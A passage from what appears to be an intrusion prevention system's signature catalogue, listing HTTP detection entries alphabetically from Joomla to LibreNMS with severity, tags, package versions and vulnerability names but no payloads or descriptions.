Last changed: sgpkg-ips-1614-5242
Vulnerability: Joomla!-CMS-Webservice-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Joomla!-CMS-Webservice-Authentication-Bypass-Sensitive-File-Access

About this situation: An attempt to exploit a vulnerability in Joomla! CMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1614-5242
Last changed: sgpkg-ips-1614-5242
Vulnerability: Joomla!-CMS-Webservice-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Joomla-Akeeba-Kickstart-Remote-Code-Execution

About this situation: An attempt to exploit a Joomla Akeeba Kickstart Remote Code Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-696-5211
Vulnerability: Joomla-Akeeba-Kickstart-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Joomla-CMS-Mod_breadcrumbs-Title-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Joomla! CMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1317-5242
Last changed: sgpkg-ips-1317-5242
Vulnerability: Joomla-CMS-Mod_breadcrumbs-Title-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Joomla-CMS-Mod_Random_Image-Link-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Joomla! CMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Vulnerability: Joomla-CMS-Mod_Random_Image-Link-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Joomla-CMS-Policy-Bypass-And-Privilege-Escalation-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Joomla detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-819-5242
Vulnerability: Joomla-CMS-Policy-Bypass-And-Privilege-Escalation-Vulnerabilities
Description:
Back to top

HTTP_CRL-Joomla-CMS-Protostar-Template-Error-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Joomla detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1343-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: Joomla-CMS-Protostar-Template-Error-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Joomla-Com_Fields-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Joomla! detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-919-5242
Last changed: sgpkg-ips-1617-5242
Vulnerability: Joomla-Com_Fields-SQL-Injection
Description:
Back to top

HTTP_CRL-Joomla-Content-History-SQL-Injection

About this situation: An attempt to exploit a Joomla Content History SQL Injection vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-775-5211
Vulnerability: Joomla-Content-History-SQL-Injection
Description:
Back to top

HTTP_CRL-Joomla-Webring-Remote-Code-Injection-Compromise

About this situation: An attempt to exploit a vulnerability in Joomla!
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, CVE2006, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Vulnerability: Joomla-Webring-Remote-File-Include-Vulnerability
Description:
Back to top

HTTP_CRL-Jorani-Unauthenticated-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Jorani detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jorani, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1669-5242
Last changed: sgpkg-ips-1669-5242
Vulnerability: Jorani-Unauthenticated-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Judge0-Sandbox-Escape-CVE-2024-28189

About this situation: An attempt to exploit a vulnerability in Veertu Anka Build detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Judge0, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1805-5242
Last changed: sgpkg-ips-1805-5242
Vulnerability: Judge0-Sandbox-Escape-CVE-2024-28189
Description:
Back to top

HTTP_CRL-Junos-OS-J-Web-Arbitrary-File-Upload-PHP-External-Variable-Modification

About this situation: An attempt to exploit a vulnerability in Junos OS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Junos OS, Any Hardware, CVE2023, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1629-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Junos-OS-J-Web-Arbitrary-File-Upload-CVE-2023-36846
Junos-OS-J-Web-PHP-External-Variable-Modification-CVE-2023-36845
Description:
Back to top

HTTP_CRL-Junos-OS-Phar-File-Deserialization-CVE-2022-22241

About this situation: An attempt to exploit a vulnerability in Junos OS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Junos OS, Any Hardware, CVE2022, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1521-5242
Vulnerability: Junos-OS-Phar-File-Deserialization-CVE-2022-22241
Description:
Back to top

HTTP_CRL-K-Collect-Remote-Coomand-Execution

About this situation: An attempt to exploit a vulnerability in K-Collect detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Description:
Back to top

HTTP_CRL-Kafka-UI-Remote-Code-Execution-CVE-2023-52251

About this situation: An attempt to exploit a vulnerability in Kafka UI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Kafka UI, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1750-5242
Vulnerability: Kafka-UI-Remote-Code-Execution-CVE-2023-52251
Description:
Back to top

HTTP_CRL-Kaltura-getUserzoneCookie-Code-Execution

About this situation: An attempt to exploit a vulnerability in Kaltura Platform detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Kaltura Community Edition, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1032-5242
Vulnerability: Kaltura-getUserzoneCookie-Code-Execution
Description:
Back to top

HTTP_CRL-Kaltura-Remote-PHP-Code-Execution

About this situation: An attempt to exploit a vulnerability in Kaltura Platform detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Kaltura Community Edition, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1032-5242
Vulnerability: Kaltura-Remote-PHP-Code-Execution
Description:
Back to top

HTTP_CRL-Karagany-CnC-Request

About this situation: A Karagany CnC request detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-597-5211
Description:
Back to top

HTTP_CRL-Kaseya-VSA-SQL-Injection-Vulnerability-CVE-2017-18362

About this situation: An attempt to exploit a vulnerability in Kaseya VSA detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Kaseya VSA, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1599-5242
Last changed: sgpkg-ips-1599-5242
Vulnerability: Kaseya-VSA-SQL-Injection-Vulnerability-CVE-2017-18362
Description:
Back to top

HTTP_CRL-Kaspersky-Anti-Virus-For-Linux-File-Server-Getreportstatus-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Kaspersky Labs Anti-Virus for Linux File Servers detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Kaspersky Labs Anti-Virus for Linux File Servers, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-947-5242
Last changed: sgpkg-ips-947-5242
Vulnerability: Kaspersky-Anti-Virus-For-Linux-File-Server-Getreportstatus-Directory-Traversal
Description:
Back to top

HTTP_CRL-Katello-Update-Roles-Missing-Authorization

About this situation: An attempt to exploit a Katello Update Roles Missing Authorization vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Katello, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-740-5211
Vulnerability: Katello-Update-Roles-Missing-Authorization
Description:
Back to top

HTTP_CRL-Kemoge-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Android, Any Hardware, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Kemoge-Botnet
Description:
Back to top

HTTP_CRL-Kentico-CMS-Staging-SyncServer-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Kentico CMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Kentico CMS, CVE2019, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1254-5242
Last changed: sgpkg-ips-1254-5242
Vulnerability: Kentico-CMS-Staging-SyncServer-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Keysight-N6854a-And-N6841a-RF-Sensor-smsRestoreDatabaseZip-SQL-Injection

About this situation: An attempt to exploit a vulnerability in KeySight N6854A and N6841A RF Sensor detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, KeySight N6854A and N6841A RF, CVE2022, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1527-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: Keysight-N6854a-And-N6841a-RF-Sensor-smsRestoreDatabaseZip-SQL-Injection
Description:
Back to top

HTTP_CRL-Kibana-Upgrade-Assistant-Telemetry-Collector-Prototype-Pollution

About this situation: An attempt to exploit a vulnerability in Elastic Kibana detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ElasticSearch, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1652-5242
Last changed: sgpkg-ips-1652-5242
Vulnerability: Kibana-Upgrade-Assistant-Telemetry-Collector-Prototype-Pollution
Description:
Back to top

HTTP_CRL-Klog-Server-authenticate.php-User-Unauthenticated-Command-Injection

About this situation: An attempt to exploit a vulnerability in Klog Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Klog Server, CVE2020, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Vulnerability: Klog-Server-authenticate.php-User-Unauthenticated-Command-Injection
Description:
Back to top

HTTP_CRL-Kong-Gateway-Admin-API-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Kong Gateway detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: OS X, Linux, Any Hardware, Kong Gateway, OS X not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Vulnerability: Kong-Gateway-Admin-API-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Korenix-Jetwave-Command-Injection-CVE-2023-23294

About this situation: An attempt to exploit a vulnerability in Korenix JetWave detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Korenix JetWave, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Korenix-Jetwave-Command-Injection-CVE-2023-23294
Description:
Back to top

HTTP_CRL-Kovter.B-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Win32.Trojan.Kovter.B-Botnet
Description:
Back to top

HTTP_CRL-Kramer-Viaware-Remote-Code-Execution-CVE-2021-35064

About this situation: An attempt to exploit a vulnerability in Kramer VIAware detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, VIAware, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1532-5242
Vulnerability: Kramer-Viaware-Remote-Code-Execution-CVE-2021-35064
Description:
Back to top

HTTP_CRL-Ksapp.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Android, Any Hardware, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Android.Spyware.Ksapp.A-Botnet
Description:
Back to top

HTTP_CRL-LabStore-SQL-Injection

About this situation: An attempt to exploit a vulnerability in LabStore detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LabStore, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1607-5242
Vulnerability: LabStore-SQL-Injection
Description:
Back to top

HTTP_CRL-LANDesk-Management-Suite-Amtversion-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in LANDesk Management Suite detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, LANDesk Management Suite, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: LANDesk-Management-Suite-Amtversion-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-LANDesk-Management-Suite-Frm_splitfrm-Remote-File-Inclusion

About this situation: An attempt to exploit a vulnerability in LANDesk Management Suite detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, LANDesk Management Suite, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: LANDesk-Management-Suite-Frm_splitfrm-Remote-File-Inclusion
Description:
Back to top

HTTP_CRL-LANDesk-Management-Suite-Remote-File-Inclusion

About this situation: An attempt to exploit a vulnerability in LANDesk Management Suite detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, LANDesk Management Suite, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-658-5211
Last changed: sgpkg-ips-1343-5242
Vulnerability: LANDesk-Management-Suite-Remote-File-Inclusion
Description:
Back to top

HTTP_CRL-Langflow-AI-RCE-CVE-2025-3248

About this situation: An attempt to exploit a vulnerability in Langflow AI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Langflow AI, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1868-5242
Vulnerability: Langflow-AI-RCE-CVE-2025-3248
Description:
Back to top

HTTP_CRL-Lansweeper-Assetactions-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Lansweeper detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Lansweeper, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1459-5242
Last changed: sgpkg-ips-1459-5242
Vulnerability: Lansweeper-Assetactions-SQL-Injection
Description:
Back to top

HTTP_CRL-Lansweeper-Getassetsbygroupid-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Lansweeper lansweeper detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Lansweeper, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1445-5242
Last changed: sgpkg-ips-1445-5242
Vulnerability: Lansweeper-Getassetsbygroupid-SQL-Injection
Description:
Back to top

HTTP_CRL-Lansweeper-Helpdeskactions.aspx-Edittemplate-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Lansweeper detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Lansweeper, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1554-5242
Last changed: sgpkg-ips-1554-5242
Vulnerability: Lansweeper-Helpdeskactions.aspx-Edittemplate-Directory-Traversal
Description:
Back to top

HTTP_CRL-Lansweeper-Helpdesksetupactions-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Lansweeper detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Lansweeper, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1457-5242
Last changed: sgpkg-ips-1457-5242
Vulnerability: Lansweeper-Helpdesksetupactions-SQL-Injection
Description:
Back to top

HTTP_CRL-Lansweeper-Webuseractions-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Lansweeper lansweeper detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Lansweeper, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1451-5242
Last changed: sgpkg-ips-1451-5242
Vulnerability: Lansweeper-Webuseractions-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Lantronix-Premierwave-Command-Injection-CVE-2021-21881

About this situation: An attempt to exploit a vulnerability in Lantronix PremierWave 2050 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Lantronix PremierWave, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1501-5242
Last changed: sgpkg-ips-1501-5242
Vulnerability: Lantronix-Premierwave-Command-Injection-CVE-2021-21881
Description:
Back to top

HTTP_CRL-Laquis-Scada-Web-Server-Relatorioindividual-Tag-Code-Injection

About this situation: An attempt to exploit a vulnerability in LAquis SCADA detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LAquis SCADA, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1163-5242
Vulnerability: Laquis-Scada-Web-Server-Relatorioindividual-Tag-Code-Injection
Description:
Back to top

HTTP_CRL-Laquis-Scada-Web-Server-Relatorioindividual-Titulo-Command-Injection

About this situation: An attempt to exploit a vulnerability in LAquis SCADA detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LAquis SCADA, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: Laquis-Scada-Web-Server-Relatorioindividual-Titulo-Command-Injection
Description:
Back to top

HTTP_CRL-Laquis-Scada-Web-Server-Relatorionome-Nome-Command-Injection

About this situation: An attempt to exploit a vulnerability in LAquis SCADA detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LAquis SCADA, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1138-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Laquis-Scada-Web-Server-Relatorionome-Nome-Command-Injection
Description:
Back to top

HTTP_CRL-LB-Link-Command-Injection-CVE-2023-26801

About this situation: An attempt to exploit a vulnerability in LB-Link wireless routers detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LB-Link, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1748-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: LB-Link-Command-Injection-CVE-2023-26801
Description:
Back to top

HTTP_CRL-Lexmark-Device-Embedded-Web-Server-RCE

About this situation: An attempt to exploit a vulnerability in a Lexmark device detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Any Hardware, Lexmark, CVE2023, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1659-5242
Last changed: sgpkg-ips-1659-5242
Vulnerability: Lexmark-Device-Embedded-Web-Server-RCE
Description:
Back to top

HTTP_CRL-LG-LED-Assistant-Remove3dlut-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in LG LED Assistant detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LG LED Assistant, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1698-5242
Last changed: sgpkg-ips-1698-5242
Vulnerability: G-LED-Assistant-Remove3dlut-Directory-Traversal
Description:
Back to top

HTTP_CRL-LG-LED-Assistant-Setthumbnailrc-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in LG LED Assistant detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LG LED Assistant, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1705-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: LG-LED-Assistant-Setthumbnailrc-Directory-Traversal
LG-LED-Assistant-API-Thumbnail-Directory-Traversal
Description:
Back to top

HTTP_CRL-LG-N1A1-NAS-Remote-Command-Execution-CVE-2018-14839

About this situation: An attempt to exploit a vulnerability in LG N1A1 NAS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LG N1A1 NAS, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1627-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: LG-N1A1-NAS-Remote-Command-Execution-CVE-2018-14839
Description:
Back to top

HTTP_CRL-LG-Simple-Editor-Command-Injection-CVE-2023-40504

About this situation: An attempt to exploit a vulnerability in LG Simple Editor detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, LG Simple Editor, CVE2023, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1769-5242
Last changed: sgpkg-ips-1769-5242
Vulnerability: LG-Simple-Editor-Command-Injection-CVE-2023-40504
Description:
Back to top

HTTP_CRL-LG-Simple-Editor-Cropimage-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in LG Simple Editor detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LG Simple Editor, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1647-5242
Last changed: sgpkg-ips-1647-5242
Vulnerability: LG-Simple-Editor-Cropimage-Directory-Traversal
Description:
Back to top

HTTP_CRL-LibreNMS-Aboutcontroller-Command-Injection

About this situation: An attempt to exploit a vulnerability in LibreNMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1810-5242
Last changed: sgpkg-ips-1818-5242
Vulnerability: LibreNMS-Aboutcontroller.php-Command-Injection
Description:
Back to top

HTTP_CRL-LibreNMS-Address-Search-Address-SQL-Injection

About this situation: An attempt to exploit a vulnerability in LibreNMS LibreNMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1696-5242
Last changed: sgpkg-ips-1696-5242
Vulnerability: LibreNMS-Address-Search-Address-SQL-Injection
Description:
Back to top

HTTP_CRL-LibreNMS-Alert-Rule-Name-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in LibreNMS LibreNMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Vulnerability: LibreNMS-Alert-Rule-Name-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-LibreNMS-API_Functions-List_Devices-Order-SQL-Injection

About this situation: An attempt to exploit a vulnerability in LibreNMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1759-5242
Last changed: sgpkg-ips-1759-5242
Vulnerability: LibreNMS-API_Functions-List_Devices-Order-SQL-Injection
Description:
Back to top

HTTP_CRL-LibreNMS-Authenticated-Command-Injection-CVE-2024-51092

About this situation: An attempt to exploit a vulnerability in LibreNMS detected
